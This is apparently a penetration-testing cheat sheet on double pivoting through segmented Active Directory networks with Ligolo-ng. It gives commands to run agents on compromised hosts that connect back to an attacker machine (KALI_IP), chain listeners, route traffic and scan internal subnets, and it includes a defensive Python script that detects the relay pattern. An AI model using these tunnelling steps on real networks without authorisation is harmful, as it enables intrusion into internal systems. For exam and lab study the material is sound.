Ligolo-ng Double Pivot
Multi-hop tunneling through segmented AD networks using Ligolo-ng agent chaining. Route injection, interface management, and traffic routing without proxychains.
How Ligolo-ng Works
Ligolo-ng creates a TUN interface on your attacker machine. Traffic routed to that interface is tunneled through the agent connection to the target network, with no proxychains required. Each agent can forward traffic to its local network.
Architecture for double pivot:
Kali → [TUN interface] → Agent1 (DMZ host) → [Agent2 listener] → Agent2 (Internal host) → Internal Network
Single Pivot Setup
# 1. Download binaries from GitHub (ligolo-ng releases)
# Attacker (Kali): run the proxy
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:11601
# Target (compromised host): upload and run agent
./agent -connect KALI_IP:11601 -ignore-cert
# Back in proxy console:
session # select Agent1
ifconfig # see target's interfaces
# Add route to internal network (e.g., 172.16.5.0/24)
sudo ip route add 172.16.5.0/24 dev ligolo
start # start tunnel
# Now scan 172.16.5.0/24 directly from Kali
nmap -sV 172.16.5.0/24
Double Pivot (Agent Chain)
For double pivot, Agent2 needs to reach back to your proxy. Since Agent2 is on an internal network, you route Agent2's connection through Agent1 using a listener on Agent1.
# Step 1: On Kali, start proxy (same as before)
./proxy -selfcert -laddr 0.0.0.0:11601
# Step 2: Connect Agent1 (DMZ host) to proxy
# [Agent1 session active in proxy console]
# Step 3: Add listener on Agent1 to forward Agent2's connection
# In proxy console with Agent1 selected:
listener_add --addr 0.0.0.0:11602 --to 127.0.0.1:11601
# This means: Agent1 listens on port 11602, forwards to proxy on Kali
# Step 4: On internal host (Agent2), connect to Agent1:11602
./agent -connect AGENT1_IP:11602 -ignore-cert
# Step 5: In proxy console, you now see two sessions
session # select Agent2
# Step 6: Add second TUN interface for the second pivot
sudo ip tuntap add user kali mode tun ligolo2
sudo ip link set ligolo2 up
# Step 7: In proxy, set interface for this session
# (press 's' to start; prompts to select which tunnel interface to use)
start
# Step 8: Add route to deep internal network via ligolo2
sudo ip route add 192.168.100.0/24 dev ligolo2
# Now you can reach 192.168.100.0/24 directly from Kali
The listener_add command opens a port on the Agent1 host. Ensure the firewall allows inbound on that port from Agent2's subnet, or the connection will fail silently.
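From the defender's side, the chain above leaves a recognizable socket pattern on the Agent1 host: one process listening on an unexpected port, serving an internal client on it, and holding an outbound session at the same time. The following is an added example (not from the original page or the Ligolo-ng project) that flags that pattern in `ss -Htnap` output. The sample data, the `find_relays` name, the baseline port set and the RFC 1918 definition of "internal" are assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed `ss -Htnap` output for a DMZ host (10.10.10.5); every address,
# PID and process name here is made up for illustration.
SAMPLE_SS = """\
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=812,fd=3))
LISTEN 0 128 0.0.0.0:11602 0.0.0.0:* users:(("updater",pid=4021,fd=7))
ESTAB 0 0 10.10.10.5:22 10.10.10.1:50122 users:(("sshd",pid=1990,fd=4))
ESTAB 0 0 10.10.10.5:51514 203.0.113.7:11601 users:(("updater",pid=4021,fd=5))
ESTAB 0 0 10.10.10.5:11602 172.16.5.20:49833 users:(("updater",pid=4021,fd=9))
ESTAB 0 0 10.10.10.5:40022 198.51.100.9:443 users:(("curl",pid=5100,fd=5))
"""

# Assumption: RFC 1918 space is "internal" (IPv4 only); adjust to the site's address plan.
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
ROW = re.compile(r'^(\S+)\s+\d+\s+\d+\s+\S+:(\d+)\s+(\S+):\S+\s+users:\(\("([^"]+)",pid=(\d+)')

def is_internal(addr):
    ip = ipaddress.ip_address(addr.strip("[]"))
    return any(ip in net for net in INTERNAL)

def find_relays(ss_output, baseline_ports=frozenset({22, 80, 443})):
    """Return processes that (1) listen on a port outside the baseline,
    (2) have an internal client connected to that port, and (3) hold an
    outbound session to a non-internal address: the shape of a forwarder."""
    rows = [m.groups() for m in map(ROW.match, ss_output.splitlines()) if m]
    listen = defaultdict(set)
    for state, lport, _peer, _name, pid in rows:
        if state == "LISTEN" and int(lport) not in baseline_ports:
            listen[pid].add(int(lport))
    clients, upstream, names = defaultdict(set), defaultdict(set), {}
    for state, lport, peer, name, pid in rows:
        if state != "ESTAB" or pid not in listen:
            continue
        names[pid] = name
        if int(lport) in listen[pid]:
            if is_internal(peer):
                clients[pid].add(peer)      # inbound to the extra listener
        elif not is_internal(peer):
            upstream[pid].add(peer)         # outbound leg of the same process
    return [{"pid": int(pid), "process": names[pid], "listen_ports": sorted(listen[pid]),
             "internal_clients": sorted(clients[pid]), "external_peers": sorted(upstream[pid])}
            for pid in listen if clients[pid] and upstream[pid]]

if __name__ == "__main__":
    for hit in find_relays(SAMPLE_SS):
        print(hit)
```

Run `ss` as root so the process column is populated, and widen `INTERNAL` when the upstream side of the relay can also sit on private address space.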
SOCKS5 + Proxychains (Alternative)
The TUN interface handles most protocols natively. Use SOCKS5 only when a specific tool requires it (e.g., some Python scripts). Note: listener_add creates TCP port forwarders (agent-side binding → Kali target); it is not a SOCKS5 proxy.
# SOCKS5 proxy (run in proxy console with a session active):
socks5 start --addr 127.0.0.1 --port 1080
# This creates a SOCKS5 proxy on Kali that routes through the selected agent tunnel
# Stop it:
socks5 stop
# Configure proxychains to use it:
# /etc/proxychains4.conf:
socks5 127.0.0.1 1080
# Use with tools that need proxychains:
proxychains nmap -sT -Pn 192.168.100.5 -p 445
# listener_add is a separate feature (TCP port forwarder on the agent side):
# listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80
# → Opens port 8080 on the agent host, forwards to Kali:80
# Useful for: making your Kali web server reachable from the internal network
Exam Tips
- Always run ifconfig on each agent session to map out new subnets before adding routes
- Use listener_list in the proxy console to see all active listeners/forwarders
- If agent disconnects, routes remain; just reconnect and start again (no route re-add needed)
- For RDP/WinRM through the tunnel, use the IP directly (no proxychains needed; traffic routes via TUN)
- Ligolo-ng beats Chisel for CPTS because you get a proper TUN interface, so Nmap SYN scans work natively